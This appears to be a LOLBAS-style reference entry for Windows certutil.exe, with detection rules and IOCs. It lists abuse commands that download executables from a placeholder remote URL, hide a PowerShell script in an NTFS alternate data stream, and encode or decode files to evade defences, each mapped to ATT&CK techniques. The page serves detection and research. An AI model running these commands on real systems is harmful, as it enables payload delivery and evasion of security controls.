.. /Certutil.exe

Star

Paths:

• C:\Windows\System32\certutil.exe
• C:\Windows\SysWOW64\certutil.exe

Resources:

• https://twitter.com/Moriarty_Meng/status/984380793383370752
• https://twitter.com/mattifestation/status/620107926288515072
• https://twitter.com/egre55/status/1087685529016193025

Acknowledgements:

• Matt Graeber (@mattifestation)
• Moriarty (@Moriarty_Meng)
• egre55 (@egre55)
• Lior Adar

Detections:

• Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml
• Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml
• Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml
• Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml
• Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml
• Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
• Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
• Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml
• IOC: Certutil.exe creating new files on disk
• IOC: Useragent Microsoft-CryptoAPI/10.0
• IOC: Useragent CertUtil URL Agent

Download

1. Download and save executable to disk in the current folder.

   certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}

   Use case

   Download file from Internet

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1105

2. Download and save executable to disk in the current folder.

   certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}

   Use case

   Download file from Internet

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1105

Alternate data streams

1. Download and save a PS1 file to an Alternate Data Stream (ADS).

   certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt

   Use case

   Download file from Internet and save it in an NTFS Alternate Data Stream

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1564.004

Encode

1. Command to encode a file using Base64

   certutil -encode {PATH} {PATH:.base64}

   Use case

   Encode files to evade defensive measures

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1027.013

Decode

1. Command to decode a Base64 encoded file.

   certutil -decode {PATH:.base64} {PATH}

   Use case

   Decode files to evade defensive measures

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1140

2. Command to decode a hexadecimal-encoded file.

   certutil -decodehex {PATH:.hex} {PATH}

   Use case

   Decode files to evade defensive measures

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1140